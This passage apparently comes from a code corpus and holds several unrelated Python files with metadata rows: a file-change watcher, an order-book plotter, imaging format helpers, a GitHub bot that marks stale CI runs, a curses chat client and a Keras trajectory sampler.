            # the context's filter_ parameter -- confirm whether the
            # context-level filter is intentionally unused here.
            filter_ = create_default_filter()
        if min_sleep_sec is None:
            min_sleep_sec = self._context._min_sleep_sec
        if sleep_sec is None:
            sleep_sec = self._context._sleep_sec
        if debounce_sec is None:
            debounce_sec = self._context._debounce_sec
        return ChangeIterator(
            run=self._context._run,
            sleep=self._context._sleep,
            path=path,
            stop_event=stop_event,
            filter_=filter_,
            sleep_sec=sleep_sec,
            min_sleep_sec=min_sleep_sec,
            debounce_sec=debounce_sec,
        )
class ChangeIterator(object):
    """Async iterator that yields debounced sets of file-system changes.

    Each __anext__ call walks the tree (in the executor) until changes have
    settled, then returns the accumulated ChangeEntry set.
    """

    def __init__(self,
        *,
        run: Runner,
        sleep: Callable[[float], Awaitable[None]],
        path: str,
        stop_event: Optional[asyncio.Event],
        filter_: Filter,
        sleep_sec: float,
        min_sleep_sec: float,
        debounce_sec: float,
    ):
        self._run = run
        self._sleep = sleep
        self._path = path
        self._stop_event = stop_event
        self._filter = filter_
        self._sleep_sec = sleep_sec
        self._min_sleep_sec = min_sleep_sec
        self._debounce_sec = debounce_sec
        # Lazily created on the first __anext__ call.
        self._walker: Union[Walker, None] = None

    def __aiter__(self):
        return self

    async def __anext__(self) -> Set[ChangeEntry]:
        # Set up the walker, and run it once to establish the baseline snapshot.
        if not self._walker:
            self._walker = Walker(self._filter, self._path)
            await self._run(self._walker)
        # Changes gathered in this iteration.
        changes: Set[ChangeEntry] = set()
        # The time interval the walker used.
        last_check_took = 0.0
        # The timestamp where the changes begin. Used to calculate debouncing.
        last_change = 0.0
        while True:
            # Check stop_event, this is the ONLY way to stop the iteration.
            if self._stop_event and self._stop_event.is_set():
                raise StopAsyncIteration
            # Nothing changed yet, update the timestamp.
            if not changes:
                last_change = now_in_sec()
            # We have to sleep awhile after we have checked last time.
            if last_check_took > 0.0:
                if changes:
                    # Likely to have more changes, sleep shorter.
                    sleep_time = self._min_sleep_sec
                else:
                    # Likely to be idle, sleep longer.
                    sleep_time = max(
                        self._sleep_sec - last_check_took,
                        self._min_sleep_sec,
                    )
                await self._sleep(sleep_time)
            # Gathering changes.
            time_before_walk = now_in_sec()
            new_changes = await self._run(self._walker)
            changes.update(new_changes)
            # Update timestamps.
            time_after_walk = now_in_sec()
            last_check_took = time_after_walk - time_before_walk
            debounced = time_after_walk - last_change
            # We end this iteration if we have got any changes, and one of the
            # following conditions has been met:
            # 1. There are no new changes to gather.
            # 2. It exceeds the debouncing time.
            if changes and (not new_changes or debounced > self._debounce_sec):
                return changes
def now_in_sec():
    """Return the current wall-clock time in seconds since the epoch."""
    return time.time()
| 33.044335 | 79 | 0.621348 | 6,218 | 0.926953 | 0 | 0 | 0 | 0 | 2,782 | 0.414729 | 1,588 | 0.236732 |
2ccd33c7f828e66ad87c73a0b3febc441c938f51 | 2,709 | py | Python | views/orderbook.py | ZigaMr/borzaKriptovalut-master | a199a9e01ae16800d7f9267424674f23b062b593 | [
"MIT"
] | null | null | null | views/orderbook.py | ZigaMr/borzaKriptovalut-master | a199a9e01ae16800d7f9267424674f23b062b593 | [
"MIT"
] | null | null | null | views/orderbook.py | ZigaMr/borzaKriptovalut-master | a199a9e01ae16800d7f9267424674f23b062b593 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import requests
import pandas as pd
import json
# Fetch the live ETH/BTC order book from Bitstamp's public API.
data = requests.get(r'https://www.bitstamp.net/api/v2/order_book/ethbtc')
data = data.json()
# Bids arrive as [price, quantity] pairs; note the columns are created in
# (quantity, price) order for bids but (price, quantity) for asks.
bids = pd.DataFrame()
bids['quantity'] = [i[1] for i in data['bids']]
bids['price'] = [i[0] for i in data['bids']]
asks = pd.DataFrame()
asks['price'] = [i[0] for i in data['asks']]
asks['quantity'] = [i[1] for i in data['asks']]
# API returns strings; convert to floats for plotting/arithmetic.
asks.price = asks.price.apply(float)
asks.quantity = asks.quantity.apply(float)
bids.price = bids.price.apply(float)
bids.quantity = bids.quantity.apply(float)
# Both dicts map price -> quantity (indices differ because of the column
# order above: bid tuples are (quantity, price), ask tuples (price, quantity)).
bids_dict = {x[1]:x[0] for x in bids.itertuples(index=False)}
asks_dict = {x[0]:x[1] for x in asks.itertuples(index=False)}
bidask = dict()
bidask['asks'] = asks_dict
bidask['bids'] = bids_dict
# Normalize the raw payload to lists of {'price', 'amount'} dicts and dump it.
data['asks'] = [{'price':float(i[0]), 'amount':float(i[1])} for i in data['asks']]
data['bids'] = [{'price':float(i[0]), 'amount':float(i[1])} for i in data['bids']]
with open('order_book2.json', 'w') as fp:
    json.dump(data, fp)
def plot_ob(bidask, bps=.25):
    """Plot a step-style order-book depth chart (bids green, asks red).

    Args:
        bidask: dict with 'bids' and 'asks', each mapping price -> size.
        bps: fractional band around the top of book to display
            (0.25 == 25%; despite the name this is not basis points).
    """
    best_bid = max(bidask["bids"].keys())
    best_ask = min(bidask["asks"].keys())
    worst_bid = best_bid * (1 - bps)
    # Bug fix: the ask-side cutoff was previously derived from best_bid even
    # though best_ask was computed (and then left unused).
    worst_ask = best_ask * (1 + bps)
    # Bids sorted descending from the best bid, asks ascending from the best ask.
    filtered_bids = sorted(filter(lambda k: k[0] >= worst_bid, bidask['bids'].items()), key=lambda x: -x[0])
    filtered_asks = sorted(filter(lambda k: k[0] <= worst_ask, bidask['asks'].items()), key=lambda x: +x[0])

    def accumulate(levels, ascending):
        """Build step-chart segments for one book side.

        Returns (hys, hxmins, hxmaxs, vxs, vymins, vymaxs): horizontal
        segments at cumulative size, and vertical risers between levels.
        """
        size_acc = 0
        hys, hxmins, hxmaxs = [], [], []
        vxs, vymins, vymaxs = [], [], []
        for (p1, s1), (p2, s2) in zip(levels, levels[1:]):
            vymins.append(size_acc)
            if size_acc == 0:
                # Seed the accumulator with the top-of-book size.
                size_acc += s1
            hys.append(size_acc)
            # Horizontal segments always run from the lower to the higher price.
            if ascending:
                hxmins.append(p1)
                hxmaxs.append(p2)
            else:
                hxmins.append(p2)
                hxmaxs.append(p1)
            vxs.append(p2)
            size_acc += s2
            vymaxs.append(size_acc)
        return hys, hxmins, hxmaxs, vxs, vymins, vymaxs

    bhys, bhxmins, bhxmaxs, bvxs, bvymins, bvymaxs = accumulate(filtered_bids, ascending=False)
    ahys, ahxmins, ahxmaxs, avxs, avymins, avymaxs = accumulate(filtered_asks, ascending=True)
    plt.hlines(bhys, bhxmins, bhxmaxs, color="green")
    plt.vlines(bvxs, bvymins, bvymaxs, color="green")
    plt.hlines(ahys, ahxmins, ahxmaxs, color="red")
    plt.vlines(avxs, avymins, avymaxs, color="red")
# d_ts = max(ob.keys())
# d_ob = ob[d_ts]
# Render the book within a 5% band of top-of-book and cap the depth axis.
plt.figure(figsize=(5,4))
plot_ob(bidask, bps=.05)
plt.ylim([0, 4000])
plt.show() | 30.1 | 107 | 0.601329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 358 | 0.132152 |
2ccdb0b6487145d0f81802a42afd953383cafac6 | 525 | py | Python | ex23.py | PhyuAye/Python_exercises-1 | 3a4049d7af5d0bb3a13b89f3040c9e26a888fea6 | [
"MIT"
] | null | null | null | ex23.py | PhyuAye/Python_exercises-1 | 3a4049d7af5d0bb3a13b89f3040c9e26a888fea6 | [
"MIT"
] | null | null | null | ex23.py | PhyuAye/Python_exercises-1 | 3a4049d7af5d0bb3a13b89f3040c9e26a888fea6 | [
"MIT"
] | 1 | 2018-06-26T08:29:44.000Z | 2018-06-26T08:29:44.000Z | import sys
# Unpack CLI arguments: script name, target encoding, and codec error
# handler (e.g. 'strict', 'replace') for the encode/decode round trip below.
script, input_encoding, error = sys.argv
def main(language_file, encoding, errors):
    """Print every remaining line of *language_file* via print_line.

    Iterative rewrite of the original tail recursion; stops at EOF.
    """
    while True:
        line = language_file.readline()
        if not line:
            return
        print_line(line, encoding, errors)
def print_line(line, encoding, errors):
    """Strip *line*, encode it with *encoding*, and show both the raw bytes
    and the decoded round trip."""
    stripped = line.strip()
    encoded = stripped.encode(encoding, errors=errors)
    decoded = encoded.decode(encoding, errors=errors)
    print(encoded, "<===>", decoded)
# Read the sample file as UTF-8 and echo each line in the encoding given on
# the command line, surfacing encode/decode behaviour.
languages = open("languages.txt", encoding="utf-8")
main(languages, input_encoding, error)
| 35 | 57 | 0.777143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.055238 |
2ccddb9cadd2a8adb62f81d94b7e34242493a393 | 5,728 | py | Python | src/imagedata/formats/__init__.py | erling6232/imagedata | 69226b317ff43eb52ed48503582e5770bcb47ec4 | [
"MIT"
] | 1 | 2021-09-02T07:20:19.000Z | 2021-09-02T07:20:19.000Z | src/imagedata/formats/__init__.py | erling6232/imagedata | 69226b317ff43eb52ed48503582e5770bcb47ec4 | [
"MIT"
] | 3 | 2018-02-28T09:54:21.000Z | 2022-03-22T10:05:39.000Z | src/imagedata/formats/__init__.py | erling6232/imagedata | 69226b317ff43eb52ed48503582e5770bcb47ec4 | [
"MIT"
] | null | null | null | """This module provides plugins for various imaging formats.
Standard plugins provides support for DICOM and Nifti image file formats.
"""
# Copyright (c) 2013-2018 Erling Andersen, Haukeland University Hospital, Bergen, Norway
import logging
import sys
import numpy as np
logger = logging.getLogger(__name__)

# Numerical codes describing how a series is sorted when read.
(SORT_ON_SLICE,
 SORT_ON_TAG) = range(2)
sort_on_set = {SORT_ON_SLICE, SORT_ON_TAG}

# Keywords describing the ordering of the 4th dimension of an acquisition
# (time series, diffusion b-values, flip angles, echo times, ...).
INPUT_ORDER_NONE = 'none'
INPUT_ORDER_TIME = 'time'
INPUT_ORDER_B = 'b'
INPUT_ORDER_FA = 'fa'
INPUT_ORDER_TE = 'te'
INPUT_ORDER_FAULTY = 'faulty'
input_order_set = {INPUT_ORDER_NONE, INPUT_ORDER_TIME, INPUT_ORDER_B, INPUT_ORDER_FA, INPUT_ORDER_TE,
                   INPUT_ORDER_FAULTY}
class NotImageError(Exception):
    """Input data cannot be interpreted as an image."""
    pass


class EmptyImageError(Exception):
    """The image contains no data."""
    pass


class UnknownInputError(Exception):
    """The input format is not recognized."""
    pass


class UnknownTag(Exception):
    """An unknown sort_on/input_order value was supplied."""
    pass


class NotTimeOrder(Exception):
    """The series is not ordered in time."""
    pass


class CannotSort(Exception):
    """The input series cannot be sorted."""
    pass


class SOPInstanceUIDNotFound(Exception):
    """A required DICOM SOPInstanceUID was not found."""
    pass


class FormatPluginNotFound(Exception):
    """No format plugin matches the requested type."""
    pass


class WriteNotImplemented(Exception):
    """The format plugin does not support writing."""
    pass
def sort_on_to_str(sort_on):
    """Return the symbolic name of a numerical sort_on value."""
    names = {SORT_ON_SLICE: "SORT_ON_SLICE", SORT_ON_TAG: "SORT_ON_TAG"}
    if sort_on not in names:
        raise (UnknownTag("Unknown numerical sort_on {:d}.".format(sort_on)))
    return names[sort_on]
def str_to_sort_on(s):
    """Map a sort_on keyword ('slice' or 'tag') to its numerical constant."""
    mapping = {"slice": SORT_ON_SLICE, "tag": SORT_ON_TAG}
    if s not in mapping:
        raise (UnknownTag("Unknown sort_on string {}.".format(s)))
    return mapping[s]
def str_to_dtype(s):
    """Map an output datatype keyword to the corresponding numpy/python type.

    Args:
        s (str): one of 'none', 'uint8', 'uint16', 'int16', 'int', 'float',
            'float32', 'float64', 'double'

    Returns:
        The matching type object, or None for 'none'.

    Raises:
        ValueError: when *s* names an unsupported datatype.
    """
    # 'float' maps to the builtin float: np.float was only ever an alias for
    # the builtin, and the alias was removed in NumPy 1.24 (so the original
    # `return np.float` now raises AttributeError).
    dtypes = {
        "none": None,
        "uint8": np.uint8,
        "uint16": np.uint16,
        "int16": np.int16,
        "int": np.int16,
        "float": float,
        "float32": np.float32,
        "float64": np.float64,
        "double": np.double,
    }
    if s not in dtypes:
        raise (ValueError("Output data type {} not implemented.".format(s)))
    return dtypes[s]
def input_order_to_str(input_order):
    """Return the symbolic INPUT_ORDER_* name for an input_order value.

    Unknown strings (custom input orders) are returned unchanged.
    """
    names = {
        INPUT_ORDER_NONE: "INPUT_ORDER_NONE",
        INPUT_ORDER_TIME: "INPUT_ORDER_TIME",
        INPUT_ORDER_B: "INPUT_ORDER_B",
        INPUT_ORDER_FA: "INPUT_ORDER_FA",
        INPUT_ORDER_TE: "INPUT_ORDER_TE",
        INPUT_ORDER_FAULTY: "INPUT_ORDER_FAULTY",
    }
    if input_order in names:
        return names[input_order]
    if issubclass(type(input_order), str):
        return input_order
    raise (UnknownTag("Unknown numerical input_order {:d}.".format(input_order)))
def input_order_to_dirname_str(input_order):
    """Return a filesystem-safe directory name for an input_order value.

    Known constants map to their keyword; other strings are sanitized to
    alphanumerics plus a few safe separators.
    """
    names = {
        INPUT_ORDER_NONE: "none",
        INPUT_ORDER_TIME: "time",
        INPUT_ORDER_B: "b",
        INPUT_ORDER_FA: "fa",
        INPUT_ORDER_TE: "te",
        INPUT_ORDER_FAULTY: "faulty",
    }
    if input_order in names:
        return names[input_order]
    if issubclass(type(input_order), str):
        keepcharacters = ('-', '_', '.', ' ')
        sanitized = ''.join(
            c for c in input_order if c.isalnum() or c in keepcharacters
        )
        return sanitized.rstrip()
    raise (UnknownTag("Unknown numerical input_order {:d}.".format(input_order)))
def str_to_input_order(s):
    """Map an input-order keyword to its INPUT_ORDER_* constant.

    Unknown strings are passed through unchanged (custom input orders).
    """
    mapping = {
        "none": INPUT_ORDER_NONE,
        "time": INPUT_ORDER_TIME,
        "b": INPUT_ORDER_B,
        "fa": INPUT_ORDER_FA,
        "te": INPUT_ORDER_TE,
        "faulty": INPUT_ORDER_FAULTY,
    }
    if s in mapping:
        return mapping[s]
    # Unknown orders are returned as-is instead of raising.
    return s
def shape_to_str(shape):
    """Convert numpy image shape to printable string

    Args:
        shape

    Returns:
        printable shape (str)

    Raises:
        ValueError: when shape cannot be converted to printable string
    """
    # The 't' marks the tag (e.g. time) axis in 4D/5D shapes.
    templates = {
        5: "{0}x{1}tx{2}x{3}x{4}",
        4: "{0}tx{1}x{2}x{3}",
        3: "{0}x{1}x{2}",
        2: "{0}x{1}",
        1: "{0}",
    }
    if len(shape) not in templates:
        raise ValueError("Unknown shape")
    return templates[len(shape)].format(*shape)
def get_size(obj, seen=None):
    """Recursively finds size of objects"""
    if seen is None:
        seen = set()
    obj_id = id(obj)
    if obj_id in seen:
        # Already counted: avoid double counting shared objects.
        return 0
    # Mark as seen *before* recursing so self-referential structures terminate.
    seen.add(obj_id)
    total = sys.getsizeof(obj)
    if isinstance(obj, dict):
        total += sum(get_size(value, seen) for value in obj.values())
        total += sum(get_size(key, seen) for key in obj.keys())
    elif hasattr(obj, '__dict__'):
        total += get_size(obj.__dict__, seen)
    elif hasattr(obj, '__iter__') and not isinstance(obj, (str, bytes, bytearray)):
        total += sum(get_size(item, seen) for item in obj)
    return total
def get_plugins_list():
    """Return the registered 'format' plugins, or an empty list when none."""
    from imagedata import plugins
    if 'format' in plugins:
        return plugins['format']
    return []
def find_plugin(ftype):
    """Return plugin for given format type."""
    for plugin_name, plugin_type, plugin_class in get_plugins_list():
        if plugin_type == ftype:
            return plugin_class()
    raise FormatPluginNotFound("Plugin for format {} not found.".format(ftype))
2ccdff6aa866a17cd0285318cd41d8c54ce3426e | 9,652 | py | Python | webservice/monitor/autoMarkTimeOutPR.py | Jiangxinz/Paddle-bot | 87a1c381f2ca6a31d5bf665945625f6710f5292e | [
"Apache-2.0"
] | 14 | 2020-05-15T01:24:22.000Z | 2022-02-23T09:03:50.000Z | webservice/monitor/autoMarkTimeOutPR.py | Jiangxinz/Paddle-bot | 87a1c381f2ca6a31d5bf665945625f6710f5292e | [
"Apache-2.0"
] | 18 | 2020-05-06T09:45:31.000Z | 2021-12-29T13:00:51.000Z | webservice/monitor/autoMarkTimeOutPR.py | Jiangxinz/Paddle-bot | 87a1c381f2ca6a31d5bf665945625f6710f5292e | [
"Apache-2.0"
] | 11 | 2020-04-28T11:17:00.000Z | 2022-02-14T01:43:27.000Z | import os
import aiohttp
import asyncio
import json
import time
import datetime
import logging
import gidgethub
import requests
from gidgethub import aiohttp as gh_aiohttp
import sys
import pandas as pd
sys.path.append("..")
from utils.auth import get_jwt, get_installation, get_installation_access_token
from utils.test_auth_ipipe import xlyOpenApiRequest
from utils.readConfig import ReadConfig
# Log regular-mark activity to a dedicated log file.
logging.basicConfig(
    level=logging.INFO,
    filename='../logs/regularMark.log',
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
# Shared configuration (e.g. required CI list per repo) from the conf dir.
localConfig = ReadConfig(path='../conf/config.ini')
class MarkTimeoutCI(object):
    def __init__(self, user, repo, gh):
        """Build GitHub and xly (iPipe) endpoint templates for *user*/*repo*.

        Args:
            user: GitHub organization or user name.
            repo: repository name.
            gh: authenticated gidgethub client used for API calls.
        """
        self.pr_url = 'https://api.github.com/repos/%s/%s/pulls?per_page=100&page=1&q=addClass' % (
            user, repo)
        self.gh = gh
        self.user = user
        self.repo = repo
        # {} placeholders are filled per CI build / PR later via str.format.
        self.mark_url = 'https://xly.bce.baidu.com/open-api/ipipe/rest/v1/job-builds/{}/mark'
        self.rerun_url = 'http://www.cipaddlepaddle.cn:8081/%s/%s/{}/{}' % (
            user, repo)
        self.comment_url = 'https://api.github.com/repos/%s/%s/issues/{}/comments' % (
            user, repo)
def getNextUrl(self, link):
"""遍历所有的PR"""
next_str = None
for i in link.split(','):
if 'rel="next"' in i:
next_str = i
break
if next_str != None:
start_index = next_str.index('<')
end_index = next_str.index('>')
url = next_str[start_index + 1:end_index]
else:
url = None
return url
    async def getBeforeSevenDaysPRList(self):
        """Collect PRs created between 7 and 30 days ago.

        1. Only gathers PRs in the 7-30 day window; no further processing.
        2. PRs older than 30 days are left alone for now: GitHub is assumed
           to have already flagged them as code conflicts. Handle later if
           needed.

        Returns:
            list[dict]: [{PR, commit, status_url}]
        """
        today = datetime.date.today()
        seven_Days_ago = str(today - datetime.timedelta(days=7))
        month_Days_ago = str(today - datetime.timedelta(days=30))
        overduelist = []
        # Walk every results page until getNextUrl returns None.
        while (self.pr_url != None):
            (code, header, body) = await self.gh._request(
                "GET", self.pr_url,
                {'accept': 'application/vnd.github.antiope-preview+json'})
            res = json.loads(body.decode('utf8'))
            for item in res:
                # ISO-8601 timestamps compare correctly as strings.
                if item['created_at'] < seven_Days_ago and item[
                        'created_at'] > month_Days_ago:
                    item_dic = {}
                    item_dic['PR'] = item['number']
                    item_dic['commit'] = item['head']['sha']
                    item_dic['status_url'] = item['statuses_url']
                    overduelist.append(item_dic)
            self.pr_url = self.getNextUrl(header['link'])
        print("before %s's PRs: %s" % (seven_Days_ago, overduelist))
        logger.info("before %s's PRs: %s" % (seven_Days_ago, overduelist))
        return overduelist
async def getCIstatus(self):
"""
获取符合条件的PR的CI列表:
1. 获取PR最新的commit url
2. 获取1的commit的最近的CI(去除一些GitHub的脏数据(eg. pending状态的))
3. 判断最近的CI是否是7天之前的,只要有一条CI是7天之前的就需要标记
4. 只标记成功的CI为失败
"""
PRList = await self.getBeforeSevenDaysPRList()
today = datetime.date.today()
seven_Days_ago = str(today - datetime.timedelta(days=7))
CI_STATUS_LIST = []
for item in PRList:
commit_ci_status = {}
commit_ci_status['PR'] = item['PR']
commit_ci_status['commit'] = item['commit']
status_url = item['status_url']
res = requests.get(status_url,
headers={'authorization': "token xxx"},
timeout=15).json()
commit_ci_status['CI'] = []
if_before_seven_day = [] #标记是否所有的CI都是7天之前的
for ci in res:
already_exit = False
if ci['context'] != 'license/cla':
for i in commit_ci_status['CI']:
if ci['context'] == i['ciName'] and i['time'] > ci[
'created_at']: #删除一些脏数据 github api
already_exit = True
break
if already_exit == False:
item_dic = {}
item_dic['time'] = ci['created_at']
item_dic['ciName'] = ci['context']
item_dic['status'] = ci['state']
item_dic['markId'] = ci['target_url'].split('/')[-1]
commit_ci_status['CI'].append(item_dic)
if item_dic['time'] > seven_Days_ago: #最新的一次CI不是7天之前的
if_before_seven_day.append(False)
else:
if_before_seven_day.append(True) #True 是7天之前的
if True in if_before_seven_day: #只要有一个CI是七天之前的就必须标记
print('%s is 7 ago..........' % item['PR'])
CI_STATUS_LIST.append(commit_ci_status)
else:
print('%s not 7 ago' % item['PR'])
logger.info("need to mark ci list: %s" % CI_STATUS_LIST)
return CI_STATUS_LIST
async def markCIFailed(self):
"""
mark success/pending ci to failed
"""
CIStatusList = await self.getCIstatus()
REQUIRED_CI = localConfig.cf.get('%s/%s' % (self.user, self.repo),
'REQUIRED_CI')
DATA = {"data": "FAIL", "message": "Paddle-bot", "type": "MARK"}
json_str = json.dumps(DATA)
headers = {
"Content-Type": "application/json",
"IPIPE-UID": "Paddle-bot"
}
for item in CIStatusList:
PR = item['PR']
commit = item['commit']
ci_list = item['CI']
mark_ci_list = []
for ci in ci_list:
if ci['ciName'] in REQUIRED_CI and ci[
'status'] in ['success', 'pending']:
markId = ci['markId']
mark_url = self.mark_url.format(markId)
res = xlyOpenApiRequest().post_method(
mark_url, json_str, headers=headers)
if res.status_code == 200 or res.status_code == 201:
mark_ci_list.append(ci['ciName'])
print('%s_%s_%s mark success!' %
(PR, commit, ci['ciName']))
logger.info('%s_%s_%s mark success!' %
(PR, commit, ci['ciName']))
else:
print('%s_%s_%s mark failed!' %
(PR, commit, ci['ciName']))
logger.error('%s_%s_%s mark failed!' %
(PR, commit, ci['ciName']))
if len(mark_ci_list) > 0:
marked = self.queryIfHasMark(PR, commit)
if marked == False:
self.inform(item)
else:
print('%s_%s has marked!!!!' % (PR, commit))
logger.info('%s_%s has marked!!!!' % (PR, commit))
data = {
'TIME': time.strftime("%Y%m%d %H:%M:%S", time.localtime()),
'PR': PR,
'COMMITID': commit,
'CINAME': mark_ci_list
}
self.save_markci_job(data)
def queryIfHasMark(self, PR, commitid):
"""marked 是否已经标记过"""
marked = True
df = pd.read_csv('../buildLog/mark_timeout_ci.csv')
queryKey = df[(df['PR'] == PR) & (df['COMMITID'] == commitid)]
if queryKey.empty:
marked = False
return marked
def create_markci_csv(self, filename):
"""创建存储文件"""
df = pd.DataFrame(columns=['TIME', 'PR', 'COMMITID', 'CINAME'])
df.to_csv(filename)
def save_markci_job(self, data):
"""将kill的任务存到"""
filename = '../buildLog/mark_timeout_ci.csv'
if os.path.exists(filename) == False:
self.create_markci_csv(filename)
write_data = pd.DataFrame(data)
write_data.to_csv(filename, mode='a', header=False)
async def inform(self, item):
"""Paddle-bot发出评论"""
#POST /repos/:owner/:repo/issues/:issue_number/comments
rerun_ci_link = self.rerun_url.format(item['PR'], item['commit'])
comment_url = self.comment_url.format(item['PR'])
shortId = item['commit'][0:7]
message = "Sorry to inform you that %s's CIs have passed for more than 7 days. To prevent PR conflicts, you need to re-run all CIs manually. " % shortId
await self.gh.post(comment_url, data={"body": message})
async def main(user, repo):
    """Authenticate as the GitHub App and run one stale-CI marking pass."""
    async with aiohttp.ClientSession() as session:
        jwt = get_jwt(os.getenv("GH_APP_ID"))
        gh = gh_aiohttp.GitHubAPI(session, user)
        try:
            installation = await get_installation(gh, jwt, user)
        except ValueError as ve:
            print(ve)
            return
        # Exchange the app JWT for an installation token and re-create the
        # client authenticated as the installation.
        access_token = await get_installation_access_token(
            gh, jwt=jwt, installation_id=installation["id"])
        authed_gh = gh_aiohttp.GitHubAPI(
            session, user, oauth_token=access_token["token"])
        await MarkTimeoutCI(user, repo, authed_gh).markCIFailed()
# Script entry point: run one marking pass for PaddlePaddle/Paddle.
loop = asyncio.get_event_loop()
loop.run_until_complete(main('PaddlePaddle', 'Paddle'))
| 40.898305 | 160 | 0.527455 | 8,580 | 0.852883 | 0 | 0 | 0 | 0 | 7,481 | 0.743638 | 2,656 | 0.264016 |
2cce9c4cd62357908959f1447500ae87d65847f9 | 2,579 | py | Python | messaging/messaging/client.py | Cornices/example | b13acfe9cf04badb326e8c1122149a81da739371 | [
"Apache-2.0"
] | 1 | 2020-06-08T09:03:40.000Z | 2020-06-08T09:03:40.000Z | messaging/messaging/client.py | Cornices/example | b13acfe9cf04badb326e8c1122149a81da739371 | [
"Apache-2.0"
] | 2 | 2017-07-11T14:04:21.000Z | 2022-01-11T14:52:32.000Z | messaging/messaging/client.py | Cornices/example | b13acfe9cf04badb326e8c1122149a81da739371 | [
"Apache-2.0"
] | 4 | 2017-03-14T14:22:57.000Z | 2021-04-13T09:37:24.000Z | import threading
import urllib2
import json
import time
import curses
_SERVER = 'http://localhost:6543'
def post(message, token):
    """Send *message* to the chat server, authenticated via *token*."""
    request = urllib2.Request(
        _SERVER, headers={'X-Messaging-Token': token})
    request.get_method = lambda: 'POST'
    request.add_data(json.dumps({'text': message}))
    urllib2.urlopen(request)
def register(name):
    """Register *name* with the server.

    Returns the session token on success, or False when the name is
    already taken (HTTP error or non-200 response).
    """
    request = urllib2.Request(_SERVER + '/users')
    request.add_data(name)
    try:
        response = urllib2.urlopen(request)
    except urllib2.HTTPError:
        return False
    if response.getcode() != 200:
        return False
    return json.loads(response.read())['token']
class UpdateThread(threading.Thread):
    """Background thread that polls the server and repaints the message pane."""

    def __init__(self, server, token, scr):
        threading.Thread.__init__(self)
        self.server = server
        self.token = token
        self.updating = False
        self.pause = 1  # seconds between polls
        self.scr = scr  # curses window to draw into

    def run(self):
        """Poll the server every ``pause`` seconds and redraw the messages."""
        self.updating = True
        headers = {'X-Messaging-Token': self.token}
        req = urllib2.Request(self.server, headers=headers)
        while self.updating:
            res = urllib2.urlopen(req)
            result = json.loads(res.read())
            if result != []:
                # Remember the cursor so it can be restored after drawing.
                y, x = self.scr.getyx()
                for index, line in enumerate(reversed(result)):
                    self.scr.addstr(index + 2, 0,
                                    '%s> %s' % (line['user'], line['text']))
                self.scr.move(y, x)
                self.scr.addstr(y, x, '')
                self.scr.refresh()
            # Bug fix: sleep on every iteration. The original did
            # ``if result == []: continue`` before the sleep, so an empty
            # poll busy-looped and hammered the server.
            time.sleep(self.pause)

    def stop(self):
        """Ask the polling loop to finish and wait for the thread to exit."""
        self.updating = False
        self.join()
def get_str(y, x, screen, msg):
    """Display *msg* at (y, x) on *screen* and read a line of input.

    Reads characters until Enter (LF, code 10) and returns them joined
    as a string (without the newline).
    """
    screen.addstr(y, x, msg)
    # Idiom fix: the original named this list ``str``, shadowing the builtin.
    chars = []
    while True:
        code = screen.getch()
        if code == 10:  # Enter
            return ''.join(chars)
        chars.append(chr(code))
def shell():
    """Interactive chat loop: register a name, then read/post until 'exit'."""
    stdscr = curses.initscr()
    stdscr.addstr(0, 0, "Welcome (type 'exit' to exit)")
    token = None
    # Bug fix: register() returns False (not None) when the name is taken;
    # the original tested ``token is None`` and fell through with
    # token == False after the first rejection.
    while not token:
        name = get_str(1, 0, stdscr, 'Select a name : ')
        token = register(name)
        if not token:
            print('That name is taken')
    update = UpdateThread(_SERVER, token, stdscr)
    update.start()
    try:
        while True:
            msg = get_str(10, 0, stdscr, '> ')
            if msg == 'exit':
                break
            post(msg, token)
            stdscr.addstr(10, 0, ' ' * 100)
    except KeyboardInterrupt:
        pass
    finally:
        # Bug fix: always stop the poller thread and restore the terminal.
        # The original only cleaned up on Ctrl-C (and then kept looping);
        # a normal 'exit' left curses active and the thread running.
        update.stop()
        curses.endwin()
if __name__ == '__main__':
    # Launch the interactive client only when executed directly.
    shell()
e2bc3af3fad8262e4f0cc2a8d1f846408ae0a6c0 | 21 | py | Python | datasets/__init__.py | zack466/autoreg-sr | 88146370c04bc299c0f4fa3a43d9dbc237bb102c | [
"BSD-3-Clause"
] | null | null | null | datasets/__init__.py | zack466/autoreg-sr | 88146370c04bc299c0f4fa3a43d9dbc237bb102c | [
"BSD-3-Clause"
] | null | null | null | datasets/__init__.py | zack466/autoreg-sr | 88146370c04bc299c0f4fa3a43d9dbc237bb102c | [
"BSD-3-Clause"
] | null | null | null | from .div2k import *
| 10.5 | 20 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
e2bce366f9cb046b38a472eee939a2538e41a996 | 2,993 | py | Python | costar_models/python/costar_models/trajectory.py | cpaxton/costar_plan | be5c12f9d0e9d7078e6a5c283d3be059e7f3d040 | [
"Apache-2.0"
] | 66 | 2018-10-31T04:58:53.000Z | 2022-03-17T02:32:25.000Z | costar_models/python/costar_models/trajectory.py | cpaxton/costar_plan | be5c12f9d0e9d7078e6a5c283d3be059e7f3d040 | [
"Apache-2.0"
] | 8 | 2018-10-23T21:19:25.000Z | 2018-12-03T02:08:41.000Z | costar_models/python/costar_models/trajectory.py | cpaxton/costar_plan | be5c12f9d0e9d7078e6a5c283d3be059e7f3d040 | [
"Apache-2.0"
] | 25 | 2018-10-19T00:54:17.000Z | 2021-10-10T08:28:15.000Z | from .abstract import AbstractAgentBasedModel
import keras.backend as K
import numpy as np
from tensorflow import TensorShape
from keras.layers import Dense, Reshape
class TrajectorySamplerNetwork(AbstractAgentBasedModel):
'''
Supervised model. Takes in a set of trajectories from the current state;
learns a distribution that will regenerate these given some source of
noise.
Essentially, our goal is to minimize the average error between the whole
set of trajectories and our samples.
'''
def __init__(self):
pass
def AddSamplerLayer(x, num_samples, traj_length, feature_size, activation=None):
'''
Size of x must be reasonable. This turns the dense input into something
reasonable.
Parameters:
x: input tensor
num_samples: number of trajectories to generate
traj_length: how many points we want to sample in each trajectory
feature_size: dimensionality of each trajectory point
activation: optional activation function to add
'''
x = Dense(num_samples * traj_length * feature_size)(x)
if activation is not None:
x = activation(x)
x = Reshape((num_samples, traj_length, feature_size))(x)
return x
class TrajectorySamplerLoss(object):
def __init__(self, num_samples, traj_length, feature_size, acc_cost=None):
self.num_samples = num_samples
self.traj_length = traj_length
self.feature_size = feature_size
self.acc_cost = acc_cost
